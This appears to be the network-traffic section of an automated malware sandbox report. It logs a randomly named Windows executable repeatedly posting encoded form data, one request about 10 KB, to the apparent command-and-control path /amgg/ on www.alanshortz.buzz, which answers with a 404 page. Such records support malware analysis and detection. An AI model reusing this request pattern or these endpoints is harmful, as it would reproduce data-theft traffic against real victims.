6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
Oct 10, 2024 14:14:27.412980080 CEST	1236	IN	Data Raw: 6c 65 20 63 78 3d 22 34 34 35 2e 38 22 20 63 79 3d 22 38 36 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 36 2e 35 20 32 39 38 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 Data Ascii: le cx="445.8" cy="867.7" r="3.7" transform="translate(-346.5 298.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circl
Oct 10, 2024 14:14:27.413009882 CEST	448	IN	Data Raw: 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 32 36 2e 32 20 32 39 38 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 Data Ascii: nsform="translate(-326.2 298.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="471.5" cy="817.7" r="3.7" transform="translate(-320.9 304.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" tran
Oct 10, 2024 14:14:27.413381100 CEST	1236	IN	Data Raw: 6c 65 20 63 78 3d 22 34 37 33 2e 31 22 20 63 79 3d 22 37 39 38 2e 32 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 31 31 2e 38 20 33 30 33 2e 34 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 Data Ascii: le cx="473.1" cy="798.2" r="3.7" transform="translate(-311.8 303.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="456.9" cy="805.7" r="3.7" transform="translate(-317 296.8) rotate(-27.1)" style="fill: #ffe029"/> <circle
Oct 10, 2024 14:14:27.413408995 CEST	224	IN	Data Raw: 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 31 36 2e 33 20 33 33 34 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 Data Ascii: form="translate(-316.3 334.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="536.8" cy="805.3" r="3.7" transform="translate(-308 333.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="539.2" cy="787.
Oct 10, 2024 14:14:27.413657904 CEST	1236	IN	Data Raw: 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 39 39 2e 38 20 33 33 32 2e 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 Data Ascii: 7" r="3.7" transform="translate(-299.8 332.3) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="541.8" cy="770.3" r="3.7" transform="translate(-291.5 331.6) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="559.9" cy="763.5
Oct 10, 2024 14:14:27.413777113 CEST	224	IN	Data Raw: 65 28 2d 32 39 30 2e 37 20 33 36 33 2e 34 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 31 32 2e 34 22 Data Ascii: e(-290.7 363.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="612.4" cy="765.8" r="3.7" transform="translate(-281.7 363.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="627.4" cy="776" r="3.7" tra
Oct 10, 2024 14:14:27.413805962 CEST	1236	IN	Data Raw: 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 38 34 2e 37 20 33 37 31 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 Data Ascii: nsform="translate(-284.7 371.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="630.6" cy="758.5" r="3.7" transform="translate(-276.4 370.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="647" cy="766.1" r="3.7" transf
Oct 10, 2024 14:14:27.413836956 CEST	224	IN	Data Raw: 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 30 39 2e 32 22 20 63 79 3d 22 37 30 31 2e 33 22 20 72 3d 22 33 2e 36 22 20 74 72 Data Ascii: (-27.1)" style="fill: #ffe029"/> <circle cx="609.2" cy="701.3" r="3.6" transform="translate(-252.7 354.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="606.7" cy="718.2" r="3.7" transform="translate(-2
Oct 10, 2024 14:14:27.413871050 CEST	1236	IN	Data Raw: 36 30 2e 36 20 33 35 35 2e 34 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 31 35 2e 37 22 20 63 79 3d Data Ascii: 60.6 355.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="615.7" cy="747.7" r="3.7" transform="translate(-273.1 362.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="602.2" cy="735.1" r="3.7" transform="translate(-26
Oct 10, 2024 14:14:27.418214083 CEST	1236	IN	Data Raw: 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 38 37 2e 34 22 20 63 79 3d 22 37 32 34 2e 36 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 Data Ascii: le="fill: #ffe029"/> <circle cx="587.4" cy="724.6" r="3.7" transform="translate(-265.7 347.3) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="590.7" cy="708.2" r="3.7" transform="translate(-257.8 347) rotate(-27.1)" style=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50027	161.97.168.245	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:14:32.575319052 CEST	792	OUT	POST /amgg/ HTTP/1.1 Host: www.alanshortz.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 201 Origin: http://www.alanshortz.buzz Referer: http://www.alanshortz.buzz/amgg/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 45 46 70 30 69 75 4e 30 7a 45 4d 68 2f 75 46 53 33 67 78 5a 37 74 64 43 71 50 31 4b 68 58 42 59 65 45 75 67 44 65 44 55 77 2b 59 6e 79 74 63 56 33 38 71 62 30 4d 33 36 7a 6d 33 30 39 47 57 79 31 69 51 7a 52 4b 49 75 4d 56 4d 75 77 4c 57 68 64 4a 49 42 2f 6d 53 4e 2f 35 77 43 2b 7a 5a 79 77 30 4c 7a 77 39 53 65 75 6c 44 6a 77 77 31 49 2b 69 6a 43 66 48 54 4d 6c 59 63 6f 66 33 4a 50 41 49 74 77 48 79 59 70 77 34 6b 37 34 52 45 6a 52 68 65 55 6c 46 63 7a 68 33 77 75 4b 69 5a 4c 48 77 4d 48 62 2b 58 50 30 4b 77 31 30 33 36 50 61 62 30 45 50 79 35 42 7a 31 64 6b 50 65 55 52 2b 67 3d 3d Data Ascii: DX3L=EFp0iuN0zEMh/uFS3gxZ7tdCqP1KhXBYeEugDeDUw+YnytcV38qb0M36zm309GWy1iQzRKIuMVMuwLWhdJIB/mSN/5wC+zZyw0Lzw9SeulDjww1I+ijCfHTMlYcof3JPAItwHyYpw4k74REjRheUlFczh3wuKiZLHwMHb+XP0Kw1036Pab0EPy5Bz1dkPeUR+g==
Oct 10, 2024 14:14:33.177476883 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 10 Oct 2024 12:14:33 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc
Oct 10, 2024 14:14:33.177541018 CEST	370	IN	Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 Data Ascii: (aL`!I>:8%>!+F3\|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50028	161.97.168.245	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:14:35.127835035 CEST	812	OUT	POST /amgg/ HTTP/1.1 Host: www.alanshortz.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 221 Origin: http://www.alanshortz.buzz Referer: http://www.alanshortz.buzz/amgg/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 45 46 70 30 69 75 4e 30 7a 45 4d 68 38 4f 31 53 78 7a 70 5a 75 64 64 46 67 76 31 4b 6f 33 42 55 65 45 69 67 44 65 71 66 7a 4e 73 6e 79 4d 73 56 32 39 71 62 78 4d 33 36 38 47 32 77 35 47 57 37 31 6c 59 42 52 4b 45 75 4d 56 59 75 77 4a 4f 68 63 36 51 65 2b 32 53 50 6d 70 77 4d 67 44 5a 79 77 30 4c 7a 77 39 57 30 75 6b 72 6a 77 44 64 49 2f 42 37 42 57 6e 54 50 7a 49 63 6f 56 58 4a 4c 41 49 74 43 48 32 34 44 77 39 67 37 34 52 55 6a 52 77 66 43 2f 56 63 31 38 6e 77 77 43 6e 39 43 44 7a 39 48 61 38 57 67 71 49 6b 74 78 78 72 56 4c 71 56 54 64 79 64 79 75 79 55 51 43 64 70 59 6c 6b 6b 48 48 36 6c 51 35 46 32 51 42 79 41 76 43 65 72 43 43 69 45 3d Data Ascii: DX3L=EFp0iuN0zEMh8O1SxzpZuddFgv1Ko3BUeEigDeqfzNsnyMsV29qbxM368G2w5GW71lYBRKEuMVYuwJOhc6Qe+2SPmpwMgDZyw0Lzw9W0ukrjwDdI/B7BWnTPzIcoVXJLAItCH24Dw9g74RUjRwfC/Vc18nwwCn9CDz9Ha8WgqIktxxrVLqVTdydyuyUQCdpYlkkHH6lQ5F2QByAvCerCCiE=
Oct 10, 2024 14:14:35.716443062 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 10 Oct 2024 12:14:35 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc
Oct 10, 2024 14:14:35.716483116 CEST	370	IN	Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 Data Ascii: (aL`!I>:8%>!+F3\|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50029	161.97.168.245	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:14:37.672550917 CEST	10894	OUT	POST /amgg/ HTTP/1.1 Host: www.alanshortz.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 10301 Origin: http://www.alanshortz.buzz Referer: http://www.alanshortz.buzz/amgg/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 45 46 70 30 69 75 4e 30 7a 45 4d 68 38 4f 31 53 78 7a 70 5a 75 64 64 46 67 76 31 4b 6f 33 42 55 65 45 69 67 44 65 71 66 7a 4e 30 6e 79 66 30 56 32 65 79 62 79 4d 33 36 69 57 32 7a 35 47 58 72 31 6b 38 46 52 4b 5a 54 4d 58 67 75 71 71 47 68 4d 62 51 65 78 32 53 50 75 4a 77 4e 2b 7a 59 79 77 30 62 76 77 2b 2b 30 75 6b 72 6a 77 47 5a 49 32 79 6a 42 61 48 54 4d 6c 59 63 30 66 33 4a 76 41 4d 4a 34 48 32 38 35 78 4f 6f 37 35 77 6b 6a 58 43 6e 43 6e 46 63 33 2f 6e 78 6a 43 6e 34 61 44 7a 78 78 61 39 7a 39 71 4b 34 74 7a 6b 53 69 57 72 5a 30 4d 69 4a 67 32 42 73 78 50 65 39 42 71 47 49 51 4a 49 39 31 37 32 32 77 48 6c 68 30 52 65 4c 44 54 30 41 46 34 7a 43 77 32 32 4e 6a 79 42 77 4b 77 33 7a 48 6b 50 4f 61 76 74 62 47 78 58 64 57 4f 30 30 6b 30 75 44 58 48 45 52 62 66 4a 59 7a 59 6e 65 4b 59 6f 73 2f 6d 66 33 71 6f 44 73 58 51 4f 33 42 43 70 52 36 31 73 6f 6a 6c 54 6c 61 4b 63 4f 6c 50 41 2b 2b 62 76 71 50 51 51 61 77 2f 4b 54 47 77 6f 79 33 39 64 71 51 67 32 70 78 4e 32 51 2b 6b 44 4e 63 38 [TRUNCATED] Data Ascii: DX3L=EFp0iuN0zEMh8O1SxzpZuddFgv1Ko3BUeEigDeqfzN0nyf0V2eybyM36iW2z5GXr1k8FRKZTMXguqqGhMbQex2SPuJwN+zYyw0bvw++0ukrjwGZI2yjBaHTMlYc0f3JvAMJ4H285xOo75wkjXCnCnFc3/nxjCn4aDzxxa9z9qK4tzkSiWrZ0MiJg2BsxPe9BqGIQJI91722wHlh0ReLDT0AF4zCw22NjyBwKw3zHkPOavtbGxXdWO00k0uDXHERbfJYzYneKYos/mf3qoDsXQO3BCpR61sojlTlaKcOlPA++bvqPQQaw/KTGwoy39dqQg2pxN2Q+kDNc8OHFnJfDysAs/pi8otixrQSBtTF6nxzx37kRBrpPKTcdWJsFYETZ9eiO/oRALapVBLV0hbR9V+FAklvd6Hjrs2Z2HCDKLkMgd8tZ3dFCNbzqPuXVyioag8ZbF8EcA4ZAi+f0Zol/8kGc+Pgqd1sWjcYJoHGknOxzlNcfifjgD1MbAx0dURNEnp0eFGVXOaFth+aD1s9FZBhab9qaSflSuMM+3xqIF2P7J75+jZ5QfMMMz7x9Pkkzl3Yjm8WRVmEHyoHBGYQ+RvV48gTAo5NAfg0xEN59cmtzlNQz+e4yx668eoZ4PjHlkbFRv2Ws2aRNg0YBeXjE9xYlNxeRjABOPdk+NluBY/ThWvQJxK2+s1BkxBIR+7Pwi/iVt0MmTA9xE9RAxkHAzmsLgNDjTrsbYr+yK2SoCXW3aWOi9nGC6aW142zUrYmYWAmFBvPa4TPaDeg9dHpqYm89EpBWdzZomU91EeCtcahzazkYfo+hUjsA59midLj1Tto0foWbiz7k4dccozOY2D6duNO7uiiIjzynEW2RSimjwvvWMErDHWaFnwKBC7Wi1vSX5qFSd7swDnHpfTIhrF5aMIGw5la3ejjFx9HJU1uWw2RFi9E//9D3wUi9NVSC0cx3CHqi/U81uxdjsj1FkqoQgHn2iasCiKmJEhyqgyyBbUS [TRUNCATED]
Oct 10, 2024 14:14:38.262106895 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 10 Oct 2024 12:14:38 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc
Oct 10, 2024 14:14:38.262125969 CEST	370	IN	Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 Data Ascii: (aL`!I>:8%>!+F3\|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50030	161.97.168.245	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:14:40.219162941 CEST	518	OUT	GET /amgg/?DX3L=JHBUhbwVlEY6ntdxvhNUx5tRlK91uXcwNHGnc+bm3N1hwsEBwOeL7N/Dy0HCt1TwyxcZSIFyMlI4p5K/Rb4a3V+poZ0/+zQh3GfvquCJzleYxHpI/yPEUU4=&GHcxP=10HpjR HTTP/1.1 Host: www.alanshortz.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Oct 10, 2024 14:14:40.818506002 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 10 Oct 2024 12:14:40 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2966 Connection: close Vary: Accept-Encoding ETag: "66cd104a-b96" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 